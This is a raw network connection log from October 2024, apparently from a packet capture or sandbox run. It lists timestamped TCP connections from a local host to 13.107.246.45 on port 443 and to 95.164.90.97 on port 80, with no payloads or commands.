Oct 7, 2024 03:15:50.361757994 CEST	443	49900	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365154028 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365201950 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365289927 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365324974 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365397930 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365449905 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365478039 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365485907 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365514040 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365524054 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365536928 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365570068 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365600109 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365600109 CEST	49899	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.365618944 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.365641117 CEST	443	49899	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.367595911 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.367636919 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.367727995 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.367846012 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.367863894 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.369307041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:50.369374990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:50.373224974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:50.377964973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:50.746987104 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.747668028 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.747693062 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.748183012 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.748192072 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.819195986 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.819961071 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.819986105 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.820492983 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.820499897 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.823451042 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.823726892 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.823750019 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.824063063 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.824069977 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.849317074 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.849384069 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.849497080 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.849508047 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.849564075 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.849744081 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.849764109 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.849776983 CEST	49901	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.849783897 CEST	443	49901	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.852936983 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.852978945 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.853068113 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.853214979 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.853229046 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.918638945 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.918839931 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.918955088 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.919173002 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.919173002 CEST	49903	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.919192076 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.919203043 CEST	443	49903	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922068119 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.922117949 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922197104 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.922370911 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.922379971 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922846079 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922934055 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922983885 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.922991037 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.923067093 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.923126936 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.923149109 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.923162937 CEST	49902	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.923172951 CEST	443	49902	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.925611973 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.925703049 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:50.925807953 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.925940990 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:50.925976992 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.020766020 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.021792889 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.021826982 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.022440910 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.022456884 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.025255919 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.028589010 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.028604984 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.029002905 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.029007912 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.091017008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:51.091232061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:51.120723009 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.120753050 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.120806932 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.120858908 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.120898962 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.121135950 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.121160984 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.121171951 CEST	49905	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.121179104 CEST	443	49905	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.123819113 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.123872995 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.123975039 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.124119997 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.124130011 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.127845049 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.127928972 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.128051996 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.128278017 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.128297091 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.128309965 CEST	49904	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.128314972 CEST	443	49904	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.130892038 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.130924940 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.131000996 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.131129980 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.131141901 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.530801058 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.531418085 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.531449080 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.532217979 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.532224894 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.560147047 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.560704947 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.560769081 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.560965061 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.561202049 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.561216116 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.561350107 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.561386108 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.561772108 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.561779022 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.635199070 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.635303020 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.635364056 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.635864019 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.635888100 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.635901928 CEST	49906	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.635909081 CEST	443	49906	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.639586926 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.639646053 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.639729023 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.640153885 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.640170097 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.659159899 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.659281015 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.659326077 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.659338951 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.659416914 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.659511089 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.659538031 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.659589052 CEST	49908	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.659604073 CEST	443	49908	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.663625956 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.663697958 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.663748980 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.663767099 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.663852930 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.663876057 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.663876057 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.663922071 CEST	49907	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.663944006 CEST	443	49907	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.664407015 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.664422989 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.667226076 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.667269945 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.667372942 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.667599916 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.667610884 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.758645058 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.792031050 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.805903912 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.817894936 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.817904949 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.818742990 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.818747997 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.838181019 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.862745047 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.862756968 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.863305092 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.863315105 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.914109945 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.914187908 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.914258003 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.962018967 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.962107897 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.962172985 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.990911007 CEST	49909	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.990936041 CEST	443	49909	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.996376991 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.996397018 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:51.996407032 CEST	49910	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:51.996412039 CEST	443	49910	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.002875090 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.002973080 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.003065109 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.004125118 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.004164934 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.004239082 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.004659891 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.004693985 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.004744053 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.004755974 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.270519972 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.311223030 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.321597099 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.342969894 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.355729103 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.364833117 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.364890099 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.365333080 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.365346909 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.365994930 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.366027117 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.366653919 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.366672039 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.367001057 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.367017984 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.367640972 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.367645979 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.460266113 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.460345984 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.460478067 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.460553885 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.463326931 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.463546991 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.463630915 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.468022108 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.468091011 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.468193054 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.468239069 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.468266010 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.474960089 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.475007057 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.475034952 CEST	49911	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.475052118 CEST	443	49911	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.476356030 CEST	49912	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.476382017 CEST	443	49912	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.479192019 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.479224920 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.479239941 CEST	49913	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.479247093 CEST	443	49913	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.505074024 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.505110979 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.505280018 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.506391048 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.506444931 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.506505013 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.506556034 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.506604910 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.506717920 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.506735086 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.506736040 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.507114887 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.507128954 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.507134914 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.507152081 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.639899969 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.640480995 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.640499115 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.641086102 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.641093016 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.655932903 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.656404018 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.656430960 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.657010078 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.657016039 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.739962101 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.740061045 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.740119934 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.740341902 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.740361929 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.740371943 CEST	49917	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.740377903 CEST	443	49917	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.743164062 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.743263960 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.743477106 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.745198965 CEST	49921	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.745235920 CEST	443	49921	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.760356903 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.760509968 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.760602951 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.762073040 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.762099028 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.762111902 CEST	49916	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.762120008 CEST	443	49916	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.765124083 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.765161991 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:52.765487909 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.765702009 CEST	49922	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:52.765727997 CEST	443	49922	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.175419092 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.175992012 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.176023006 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.176630020 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.176636934 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.177171946 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.177829027 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.177845001 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.178261995 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.178268909 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.181004047 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.181906939 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.181932926 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.182373047 CEST	49920	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.182379007 CEST	443	49920	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.278119087 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.278445959 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.278518915 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.278570890 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.278594017 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.278605938 CEST	49919	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.278613091 CEST	443	49919	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.279736042 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.280689955 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.280742884 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.280745983 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281254053 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281402111 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281423092 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.281435013 CEST	49918	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281440973 CEST	443	49918	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.281666040 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281711102 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.281775951 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281930923 CEST	49923	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.281946898 CEST	443	49923	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.283559084 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.283576012 CEST	443	49924	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:53.283639908 CEST	49924	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:53.283742905 CEST	49924	443	192.168.2.5	13.107.246.45
